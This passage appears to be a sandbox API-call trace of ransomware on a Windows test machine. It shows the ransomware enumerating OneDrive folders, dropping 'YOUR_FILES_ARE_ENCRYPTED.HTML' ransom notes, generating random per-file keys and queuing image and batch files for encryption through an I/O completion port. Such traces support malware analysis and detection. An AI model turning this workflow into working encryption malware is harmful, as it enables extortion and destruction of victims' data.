lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x980cd2db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x980cd2db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.703] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x980cd2db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x980cd2db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 1 [0111.704] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x980cd2db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x980cd2db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x18f405b, cFileName="..", cAlternateFileName="")) returned 0 [0111.704] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.704] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0111.704] GetProcessHeap () returned 0x600000 [0111.704] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\kok\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0111.705] WriteFile (in: hFile=0x334, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.705] CloseHandle (hObject=0x334) returned 1 [0111.706] GetProcessHeap () returned 0x600000 [0111.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.706] GetProcessHeap () returned 0x600000 [0111.706] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0111.708] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x980cd2db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x980cd2db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x980cd2db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kok", cAlternateFileName="")) returned 0 [0111.708] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.708] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0111.708] GetProcessHeap () returned 0x600000 [0111.708] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0111.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.709] WriteFile (in: hFile=0x31c, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.710] CloseHandle (hObject=0x31c) returned 1 [0111.710] GetProcessHeap () returned 0x600000 [0111.710] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0111.710] GetProcessHeap () returned 0x600000 [0111.710] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.739] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13a98591, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x27e196bc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x27e196bc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="17.3.5892.0626_1", cAlternateFileName="173589~2.062")) returned 1 [0111.739] StrStrIW (lpFirst="17.3.5892.0626_1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.739] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1") returned 75 [0111.739] GetProcessHeap () returned 0x600000 [0111.739] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.740] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1" [0111.740] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\*" [0111.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13a98591, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x27e196bc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x27e196bc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName=".", cAlternateFileName="")) returned 0x626778 [0111.741] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13a98591, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x27e196bc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x27e196bc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="..", cAlternateFileName="")) returned 1 [0111.742] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13d93484, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13d93484, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x13ec46bb, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x123c, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayLogo.png", cAlternateFileName="AUTOPL~1.PNG")) returned 1 [0111.742] StrStrIW (lpFirst="AutoPlayLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.742] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png") returned 92 [0111.742] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0111.742] lstrlenW (lpString=".png") returned 4 [0111.742] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0111.742] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0111.743] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4668) returned 1 [0111.743] GetProcessHeap () returned 0x600000 [0111.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.745] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7B") returned 2 [0111.745] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="B7") returned 2 [0111.745] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="16") returned 2 [0111.745] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="A6") returned 2 [0111.745] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="15") returned 2 [0111.745] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A0") returned 2 [0111.745] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="DA") returned 2 [0111.745] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="F6") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F7") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D7") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="3A") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="6B") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="A6") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="79") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="4F") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="A8") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="BA") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="76") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="52") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="3F") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="49") returned 2 [0111.746] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="B9") returned 2 [0111.746] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="7C") returned 2 [0111.746] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B2") returned 2 [0111.746] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="BC") returned 2 [0111.746] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="02") returned 2 [0111.746] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C6") returned 2 [0111.746] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="37") returned 2 [0111.746] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="68") returned 2 [0111.746] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E4") returned 2 [0111.746] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="53") returned 2 [0111.746] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="10") returned 2 [0111.747] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png" [0111.747] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.747] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.747] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x141bf54b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x141bf54b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x14742dc7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x5d8f6, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.gif", cAlternateFileName="AUTOPL~1.GIF")) returned 1 [0111.747] StrStrIW (lpFirst="AutoPlayOptIn.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.747] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif") returned 93 [0111.747] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0111.747] lstrlenW (lpString=".gif") returned 4 [0111.747] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0111.747] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.748] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=383222) returned 1 [0111.748] GetProcessHeap () returned 0x600000 [0111.748] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.759] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="85") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="F6") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="18") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="B9") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="04") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="6A") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A7") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="21") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="67") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="3C") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="61") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="C0") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="79") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="52") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="CD") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7A") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="B7") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="49") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="12") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C0") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="EA") returned 2 [0111.759] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="CA") returned 2 [0111.759] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="1B") returned 2 [0111.759] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="5D") returned 2 [0111.759] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="46") returned 2 [0111.759] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="96") returned 2 [0111.759] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="3F") returned 2 [0111.759] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="20") returned 2 [0111.759] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="29") returned 2 [0111.759] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="2C") returned 2 [0111.759] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="A2") returned 2 [0111.759] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0D") returned 2 [0111.760] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.gif" [0111.760] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.760] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.777] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x149cb56a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x149cb56a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x14e439d9, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x27f2, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.png", cAlternateFileName="AUTOPL~2.PNG")) returned 1 [0111.777] StrStrIW (lpFirst="AutoPlayOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.778] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png") returned 93 [0111.778] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0111.778] lstrlenW (lpString=".png") returned 4 [0111.778] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0111.778] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplayoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0111.779] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=10226) returned 1 [0111.779] GetProcessHeap () returned 0x600000 [0111.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0111.781] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="76") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="7D") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="75") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="C9") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="24") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="8D") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="2E") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="28") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="A9") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="82") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="00") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="17") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="F7") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="3A") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="CC") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="43") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="0B") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="25") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="9F") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="EF") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="70") returned 2 [0111.781] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="44") returned 2 [0111.781] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="D0") returned 2 [0111.781] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D2") returned 2 [0111.781] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="08") returned 2 [0111.781] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="15") returned 2 [0111.781] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="44") returned 2 [0111.781] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="56") returned 2 [0111.781] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="12") returned 2 [0111.781] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="8B") returned 2 [0111.781] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="3F") returned 2 [0111.781] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="38") returned 2 [0111.782] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayOptIn.png" [0111.782] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.782] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0111.782] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1513eaa7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1513eaa7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1526fd00, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x16da, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="CollectOneDriveLogs.bat", cAlternateFileName="COLLEC~1.BAT")) returned 1 [0111.782] StrStrIW (lpFirst="CollectOneDriveLogs.bat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.782] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\CollectOneDriveLogs.bat") returned 99 [0111.782] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0111.782] lstrlenW (lpString=".bat") returned 4 [0111.782] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0111.782] SystemFunction036 (in: RandomBuffer=0x19e16c, 